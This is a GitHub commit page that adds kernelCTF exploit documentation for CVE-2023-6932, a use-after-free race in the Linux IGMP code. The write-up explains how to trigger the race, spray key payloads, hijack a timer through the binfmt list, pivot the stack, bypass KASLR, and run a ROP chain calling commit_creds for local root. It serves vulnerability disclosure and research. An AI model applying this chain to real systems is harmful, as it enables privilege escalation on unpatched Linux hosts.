Skip to content

Commit

Permalink
Browse files Browse the repository at this point in the history
* Add CVE-2023-6932

* Minor documentation tweaks
  • Loading branch information
liona24 authored May 29, 2024
1 parent 822fee1 commit 422d0c3
Show file tree
Hide file tree
Showing 9 changed files with 1,205 additions and 0 deletions.
217 changes: 217 additions & 0 deletions pocs/linux/kernelctf/CVE-2023-6932_cos/docs/exploit.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,217 @@
## Triggering the Vulnerability

In `igmp_heard_query` in `net/ipv4/igmp.c` a timer object is registered upon
receiving an IGMP Heard Query ([2]):

```c
static bool igmp_heard_query(struct in_device *in_dev, struct sk_buff *skb,
int len)
{
struct ip_mc_list *im;
// ...
rcu_read_lock();
for_each_pmc_rcu(in_dev, im) {
int changed;

// ...

spin_lock_bh(&im->lock); // [1.a]
if (im->tm_running)
im->gsquery = im->gsquery && mark;
else
im->gsquery = mark;
changed = !im->gsquery ||
igmp_marksources(im, ntohs(ih3->nsrcs), ih3->srcs);
spin_unlock_bh(&im->lock); // [1.b]
if (changed)
igmp_mod_timer(im, max_delay); // [2]
}
rcu_read_unlock();
// ...
}
```
While iterating over the `in_dev->mc_list` list, the `im` object may get dropped by a
concurrent thread in `__ip_mc_dec_group` ([3]):
```c
void __ip_mc_dec_group(struct in_device *in_dev, __be32 addr, gfp_t gfp)
{
struct ip_mc_list *i;
struct ip_mc_list __rcu **ip;
ASSERT_RTNL();
for (ip = &in_dev->mc_list;
(i = rtnl_dereference(*ip)) != NULL;
ip = &i->next_rcu) {
if (i->multiaddr == addr) {
if (--i->users == 0) {
// ..
ip_ma_put(i); // [3]
return;
}
break;
}
}
}
```

If the reference count of the object drops to zero, the object will be registered
for an RCU free cycle.
This is problematic, because `igmp_mod_timer` will register the timer even if
the reference count is already zero ([4]):
```c
static void igmp_start_timer(struct ip_mc_list *im, int max_delay)
{
int tv = prandom_u32() % max_delay;

im->tm_running = 1;
if (!mod_timer(&im->timer, jiffies+tv+2)) // [4]
refcount_inc(&im->refcnt); // [5]
}
```
Our goal will be contending the `im->lock` in [1.a] while hitting the `__ip_mc_dec_group`
function in order to hit the race.
We contend the lock by repeatedly sending large IGMP packet bursts.
We further increase our chances of hitting a race by increasing the number of
members of the `in_dev->mc_list`.
There are few ways to add members to the list. I chose the `IP_ADD_MEMBERSHIP`
`setsockopt()` call, which will call `ip_mc_join_group`, eventually reaching
`__ip_mc_join_group` and add the corresponding members.
We can remove all the members by simply closing the socket fd (thus hitting
`__ip_mc_dec_group` for each one)
We will setup a virtual network for sending the IGMP packets. This makes us
require CAP_NET_ADMIN, for which we will leverage a user namespace.
Once we hit the race a warning of a saturating reference count will be logged
by the kernel (in [5]).
We can observe the timing difference when sending the packets, thus we will be
able to deduce when we hit the race.
We will pin the main thread (which adds the group memberships) to one specific
CPU. The burst thread is allowed to be distributed freely in order to maximise
the burst potential.
## Exploiting the Use-After-Free
### Stage 1
Our target object is the `struct ip_mc_list` which resides in the kmalloc-196
cache, allocated using `GFP_KERNEL`.
After the timer is registered on the freed object, we will need to corrupt the
`struct timer_list timer` member at offset 64:
```c
struct timer_list {
struct hlist_node entry;
unsigned long expires;
void (*function)(struct timer_list *);
u32 flags;
};
```
Specifically we obviously target the `function` entry, while giving some special
care to the list `entry` member.

For the sake of simplicity we will use `NR_add_key` syscall to spray key payloads,
giving us nearly full control of the payload.

The nature of the bug imposes two problems: 1) We have limited payload size
due to the fact that we are in `kmalloc-196` and 2) we are in an interrupt context
when the timer expires.
The function will be invoked with the `struct timer_list*` pointer to itself as the first argument.
Usually a developer would use this in conjunction with the `from_timer(..)` macro
to get the original container object. We will however utilize the pointer argument
to work around the mentioned problems, abusing the binfmt subsystem of the kernel.
We simply choose the `__register_binfmt` function pointer as our timer function.
This function adds its first argument to the binfmt handler list, thus will register
our (corrupted) object as a `struct linux_binfmt*` that can be used later.
Unluckily, the RSI register is polluted, thus our object is registered as the
first binfmt handler. We therefor have to hurry to clean it up and prepare it
for the second stage, otherwise another user of the binfmt will likely panic
the kernel.

### Stage 2

Once the timer expired, we will free our key payload and immediateley reclaim
it with the second stage payload.
Again, we will use the `NR_add_key` syscall for this, this time to override
a `struct linux_binfmt`:

```c
/*
* This structure defines the functions that are used to load the binary formats that
* linux accepts.
*/
struct linux_binfmt {
struct list_head lh;
struct module *module;
int (*load_binary)(struct linux_binprm *);
int (*load_shlib)(struct file *);
int (*core_dump)(struct coredump_params *cprm);
unsigned long min_coredump; /* minimal dump size */
} __randomize_layout;
```

When executing a binary, the kernel will look through its binfmt handlers in
order to find the right interpreter. This happens in
`search_binary_handler(struct linux_binprm *bprm)` in `fs/exec.c`.
The handlers will typically check for magic bytes (max 256) at the beginning of
the file. Luckily for us, reading of those bytes is sufficiently close to the
actual call to `linux_binfmt.load_binary`. Therefor a pointer to the memory read
is still alive in a register (specifically RBX in this case).
We can use this gadget as a trivial stack pivot onto the file contents:
```s
0xffffffff816067e1:
push rbx
pop rsp
```

We then prepare another ROP payload in the file:
```c
// fixup the format list
rop_chain[j++] = pop_rsi;
rop_chain[j++] = formats - 8;
rop_chain[j++] = pop_rax;
rop_chain[j++] = (u64)payload->u.fmt.lh.next;
rop_chain[j++] = mov_qword_rsi8_rax;

// prepare a privesc payload
rop_chain[j++] = pop_rdi;
rop_chain[j++] = init_task;
rop_chain[j++] = prepare_kernel_cred;
rop_chain[j++] = mov_rdi_rax;
rop_chain[j++] = commit_creds;
rop_chain[j++] = pop_rdi;
rop_chain[j++] = 1;
rop_chain[j++] = find_task_by_vpid;
rop_chain[j++] = mov_rdi_rax;
rop_chain[j++] = pop_rsi;
rop_chain[j++] = init_nsproxy;
rop_chain[j++] = switch_task_namespaces;
rop_chain[j++] = __do_sys_fork;
rop_chain[j++] = pop_rdi;
rop_chain[j++] = 9999999;
rop_chain[j++] = __msleep;
```

Special care has to be taken in order to remove the handler from the binfmt
list. After that we place a common privilege escalation payload.
Finally we finish using a `do_sys_fork` utilizing the tele-fork technique
described [here](https://blog.kylebot.net/2022/10/16/CVE-2022-1786/) in order to finish the chain trivially.

Eventually we can then execute our file and trigger the payload.

## KASLR Bypass

In order to get a kernel pointer to bypass KASLR, we will adapt timing side channels
for simplicity reasons.
The code for that is adapted from https://github.com/IAIK/prefetch/blob/master/cacheutils.h

## Stability Notes

In low noise environments the exploit is relatively stable (~70-80% during local
testing).
On the remote instance the success chances drop significantly.
I assume this is due to more background activity combined with the fact that
the nature of the bug is very volatile.
13 changes: 13 additions & 0 deletions pocs/linux/kernelctf/CVE-2023-6932_cos/docs/vulnerability.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,13 @@
- Requirements:
- Kernel configuration: CONFIG_IP_MULTICAST=y
- Either:
- Possibility to send IGMP packets
- CAP_NET_ADMIN or user namespaces
- Introduced by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/diff/net/ipv4/igmp.c?id=1da177e4c3f4
- Fixed by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=e2b706c691905fe78468c361aaabc719d0a496f1
- Affected Version: v2.6.12-rc2 - v6.7-rc7
- Affected Component: ipv4/igmp
- Syscall to disable: disallow unprivileged username space
- URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2023-6932
- Cause: Use-After-Free
- Description: A use-after-free vulnerability in the Linux kernel's ipv4: igmp component can be exploited to achieve local privilege escalation. A race condition can be exploited to cause a timer be mistakenly registered on a RCU read locked object which is freed by another thread.
Original file line number Diff line number Diff line change
@@ -0,0 +1,3 @@

exploit: *.c
$(CC) -O3 -ggdb -static -Wall -lpthread -o exploit $^
Binary file not shown.
Loading

0 comments on commit 422d0c3

Please sign in to comment.